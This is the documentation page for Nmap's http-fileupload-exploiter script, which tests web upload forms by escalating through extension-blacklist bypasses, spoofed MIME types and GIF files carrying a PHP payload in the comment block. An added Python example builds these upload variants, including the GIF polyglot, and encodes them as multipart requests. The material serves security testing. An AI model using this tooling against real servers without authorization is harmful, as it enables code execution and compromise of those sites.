Script http-fileupload-exploiter

Script types: portrule
Categories: intrusive, exploit, vuln

Script Summary

Exploits insecure file upload forms in web applications using various techniques, such as changing the Content-Type header or creating valid image files that carry the payload in the comment block.

Script Arguments


The script will try to fill every field found in the upload form but that may fail due to fields' restrictions. You can manually fill those fields using this table. For example, {gender = "male", email = ""}. Default: {}


The pages that contain the forms to exploit. For example, {/upload.php, /login.php}. Default: nil (crawler mode on)


Directories with the uploaded files. For example, {/avatars, /photos}. Default: {'/uploads', '/upload', '/file', '/files', '/downloads'}


See the documentation for the slaxml library.

httpspider.doscraping, httpspider.maxdepth, httpspider.maxpagecount, httpspider.noblacklist, httpspider.url, httpspider.useheadfornonwebfiles, httpspider.withindomain, httpspider.withinhost

See the documentation for the httpspider library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

Example Usage

nmap -p80 --script http-fileupload-exploiter.nse <target>

This script discovers the upload form on the target's page and
attempts to exploit it using 3 different methods:

1) At first, it tries to upload payloads with different insecure
extensions (for example 1.php3 instead of 1.php). This works against
a weak blacklist used by a file name extension verifier.

2) If (1) doesn't work, it will try to upload the same payloads,
this time with different Content-Type headers, like "image/gif"
instead of "text/plain". This tricks mechanisms that check only the
client-supplied MIME type.

3) If (2) doesn't work, it will create some proper GIF images that
contain the payloads in the comment block. The server-side
interpreter still finds and executes the code embedded among the
binary image data. This bypasses checks that inspect the actual
content of the uploaded file (magic bytes or image-library
parsing), although the file must still be served through the
interpreter for the payload to run, which is why the upload is
verified by requesting it back from the uploads directory.

* Use the vulns library to report.
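The three techniques above, as an added worked example in Python. This is not the script's own Lua code; the payload, the extension and MIME lists, the multipart field name and the two toy server-side checks are assumptions made for illustration.

```python
"""Build the three upload variants described above and show why each one
slips past its check. Added example; the payload, lists and the toy
server-side checks below are assumptions, not the NSE script's code."""
import struct

# Assumed PHP probe payload; the real script ships its own payloads.
PAYLOAD = b"<?php echo 'upload-ok'; ?>"
# Technique 1: alternative extensions a weak blacklist often misses.
EXTENSIONS = ["php", "php3", "php4", "php5", "phtml"]
# Technique 2: client-controlled MIME types a server might trust.
MIME_TYPES = ["text/plain", "image/gif", "image/jpeg", "image/png"]


def gif_with_comment(comment: bytes) -> bytes:
    """Return a structurally valid 1x1 GIF89a whose Comment Extension
    (introducer 0x21, label 0xFE) carries `comment` (technique 3)."""
    header = b"GIF89a"
    # Logical screen descriptor: 1x1, global colour table present, 2 colours.
    lsd = struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
    gct = b"\x00\x00\x00\xff\xff\xff"
    # Comment data is split into sub-blocks of <= 255 bytes, then 0x00.
    sub_blocks = b"".join(bytes([len(comment[i:i + 255])]) + comment[i:i + 255]
                          for i in range(0, len(comment), 255))
    comment_ext = b"\x21\xfe" + sub_blocks + b"\x00"
    # Image descriptor (0x2C): 1x1 image at the origin, no local colour table.
    image_desc = b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
    # LZW min code size 2; codes clear(4), pixel 0, end(5) pack to 0x44 0x01.
    image_data = b"\x02" + b"\x02\x44\x01" + b"\x00"
    return header + lsd + gct + comment_ext + image_desc + image_data + b"\x3b"


def gif_comments(data: bytes) -> list:
    """Walk the GIF block structure and return every comment payload. A
    malformed file raises (ValueError/IndexError), so this doubles as a
    validity check on what gif_with_comment() produced."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    _, _, flags, _, _ = struct.unpack("<HHBBB", data[6:13])
    pos = 13 + (3 * (2 << (flags & 7)) if flags & 0x80 else 0)

    def sub_blocks(p):
        out = b""
        while data[p] != 0:
            n = data[p]
            out += data[p + 1:p + 1 + n]
            p += 1 + n
        return out, p + 1

    comments = []
    while True:
        introducer = data[pos]
        if introducer == 0x3B:                      # trailer
            return comments
        if introducer == 0x21:                      # extension block
            label = data[pos + 1]
            body, pos = sub_blocks(pos + 2)
            if label == 0xFE:
                comments.append(body)
        elif introducer == 0x2C:                    # image descriptor
            lflags = data[pos + 9]
            pos += 10 + (3 * (2 << (lflags & 7)) if lflags & 0x80 else 0)
            _, pos = sub_blocks(pos + 1)            # skip LZW size + image data
        else:
            raise ValueError("unknown block 0x%02x at %d" % (introducer, pos))


def multipart_part(field: str, filename: str, mime: str, data: bytes,
                   boundary: str = "----nseExampleBoundary") -> tuple:
    """Encode one file field as multipart/form-data and return
    (body, Content-Type header value). The per-part Content-Type line is
    the value technique 2 varies."""
    head = (f'--{boundary}\r\nContent-Disposition: form-data; name="{field}"; '
            f'filename="{filename}"\r\nContent-Type: {mime}\r\n\r\n').encode()
    body = head + data + b"\r\n" + f"--{boundary}--".encode() + b"\r\n"
    return body, f"multipart/form-data; boundary={boundary}"


def build_attempts() -> list:
    """Return (technique, filename, mime, data) tuples in the order the
    script escalates: extensions, then MIME variants, then GIF wrapping."""
    attempts = [(1, f"1.{ext}", "text/plain", PAYLOAD) for ext in EXTENSIONS]
    attempts += [(2, f"1.{ext}", mime, PAYLOAD)
                 for ext in EXTENSIONS for mime in MIME_TYPES[1:]]
    gif = gif_with_comment(PAYLOAD)
    attempts += [(3, f"1.{ext}", "image/gif", gif) for ext in EXTENSIONS]
    return attempts


# Toy models (assumed) of the server-side checks each technique targets.
def weak_extension_blacklist(filename: str) -> bool:
    """True if rejected: blocks only '.php', so '1.php3' passes (technique 1)."""
    return filename.lower().endswith(".php")


def magic_bytes_check(data: bytes) -> bool:
    """True if accepted: trusts the leading bytes only, so the GIF-wrapped
    payload is accepted as an image (technique 3)."""
    return data[:6] in (b"GIF87a", b"GIF89a")
```

build_attempts() yields the parts in escalation order; each (filename, mime, data) goes through multipart_part() and is POSTed to the form's action URL, after which the file is requested back from each configured uploads directory to see whether the payload executed rather than being served as a static file. The toy checks make the point of the page concrete: gif_with_comment() output parses as a valid GIF and passes a magic-bytes check while still containing the PHP payload verbatim.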

Script Output

80/tcp open  http    syn-ack
|   Testing page /post.html
|     Successfully uploaded and executed payloads:
|      Filename: 1.php, MIME: text/plain
|_     Filename: 1.php3, MIME: text/plain



  • George Chatzisofroniou

License: Same as Nmap--See